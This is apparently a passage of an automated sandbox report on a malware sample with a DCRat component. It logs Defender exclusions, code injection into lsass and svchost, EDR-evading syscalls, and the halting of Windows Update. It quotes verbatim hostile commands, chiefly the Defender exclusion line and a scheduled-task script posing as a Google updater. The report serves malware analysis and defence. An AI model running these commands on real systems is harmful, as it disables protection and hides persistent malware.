Source: C:\Windows\System32\svchost.exe	Code function: 37_2_0000023560547E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_0000023560547E70
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_00000293F7FC7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00000293F7FC7E70
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_00000293F7FCB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00000293F7FCB50C
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_000001ECE818B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_000001ECE818B50C
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_000001ECE8187E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_000001ECE8187E70
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C674B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_00000223C674B50C
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C6747E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_00000223C6747E70

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Local\Temp\hs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 1881F850000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 264CD7C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BEC42D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 23BF37C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1935CDD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B1E5590000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21CAFA80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E7BB740000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2355FFB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 293F7F90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1ECE8150000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\updater.exe base: 2A5F0AB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E223000000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 217C8F30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 151B13C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22ED39D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2C138570000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F4E6AB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 212AEDB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 161BCB00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 13E68160000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C367DD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1435F940000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D299360000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2BE857A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20F7C9A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CC1C740000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\launcher.exe

6_2_00007FF77E0885B0

Contains functionality to inject threads in other processes

Source: C:\Users\user\AppData\Local\Temp\launcher.exe

6_2_00007FF77E0885B0

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 1F852908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: CD7C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: C42D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\dwm.exe EIP: F37C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5CDD2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: E5592908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: AFA82908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: BB742908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5FFB2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F7F92908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Program Files\Google\Chrome\updater.exe EIP: F0AB2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: E8152908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 23002908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: C8F32908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: B13C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D39D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 38572908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E6AB2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AEDB2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BCB02908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 68162908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 67DD2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5F942908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 99362908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 857A2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7C9A2908	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\launcher.exe	NtEnumerateValueKey: Indirect: 0x1EDF1662AF5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	NtEnumerateValueKey: Indirect: 0x1EDF1662AC1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hs.exe	NtQuerySystemInformation: Direct from: 0x7FF7C3F6723E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	NtDeviceIoControlFile: Indirect: 0x1EDF1662D4D	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtAdjustPrivilegesToken: Direct from: 0x7FF69571723E

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1881F850000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 264CD7C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BEC42D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 23BF37C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1935CDD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1E5590000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21CAFA80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E7BB740000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2355FFB0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 293F7F90000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ECE8150000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\updater.exe base: 2A5F0AB0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E223000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 217C8F30000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151B13C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22ED39D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C138570000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F4E6AB0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 212AEDB0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 161BCB00000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13E68160000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C367DD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1435F940000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D299360000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BE857A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20F7C9A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CC1C740000 value starts with: 4D5A	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\svchost.exe	Memory written: PID: 6364 base: FA0000 value: 00
Source: C:\Windows\System32\svchost.exe	Memory written: PID: 6364 base: 10B22D8 value: 00
Source: C:\Windows\System32\svchost.exe	Memory written: PID: 6952 base: B40000 value: 00
Source: C:\Windows\System32\svchost.exe	Memory written: PID: 6952 base: 8A92D8 value: 00

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\hs.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\hs.exe	Thread register set: target process: 5852	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 6444
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 1856
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 5548

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\hs.exe	Memory written: C:\Windows\System32\dialer.exe base: 9E3EA45010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1881F850000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 264CD7C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BEC42D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 23BF37C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1935CDD0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1E5590000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21CAFA80000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E7BB740000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2355FFB0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 293F7F90000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ECE8150000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\updater.exe base: 2A5F0AB0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E223000000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 217C8F30000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151B13C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22ED39D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C138570000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F4E6AB0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 212AEDB0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 161BCB00000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13E68160000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C367DD0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1435F940000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D299360000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BE857A0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20F7C9A0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CC1C740000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 223C66B0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 223C66B0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 223C66B0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 223C66B0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 223C66B0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 223C66B0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 223C66B0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 223C66B0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 223C66B0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 223C66B0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 223C66B0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 223C6300000
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: BFDB305010
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: FE7ACC2010
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 421A2B3010

Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\hs.exe "C:\Users\user\AppData\Local\Temp\hs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\launcher.exe "C:\Users\user\AppData\Local\Temp\launcher.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hs.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\mxUJuDSBL8uYxNL3S2me9mvpl9XOE7C7oXpLzzbyKUU0.vbe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c pause	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#nbpkbwke#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
Source: C:\Users\user\AppData\Local\Temp\hs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#nbpkbwke#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }			Jump to behavior

Source: C:\Windows\System32\dialer.exe

Code function: 20_2_00007FF62DC31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

20_2_00007FF62DC31C64

Source: C:\Windows\System32\dialer.exe

Code function: 20_2_00007FF62DC31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

20_2_00007FF62DC31C64

Source: winlogon.exe, 00000018.00000000.2459369575.0000018820251000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000018.00000002.3741673612.0000018820251000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: winlogon.exe, 00000018.00000000.2459369575.0000018820251000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000018.00000002.3741673612.0000018820251000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000018.00000000.2459369575.0000018820251000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000018.00000002.3741673612.0000018820251000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000018.00000000.2459369575.0000018820251000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000018.00000002.3741673612.0000018820251000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_0008F654 cpuid

3_2_0008F654

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		3_2_0008AF0F
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: GetLocaleInfoEx,FormatMessageA,		6_2_00007FF77E09FE34

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
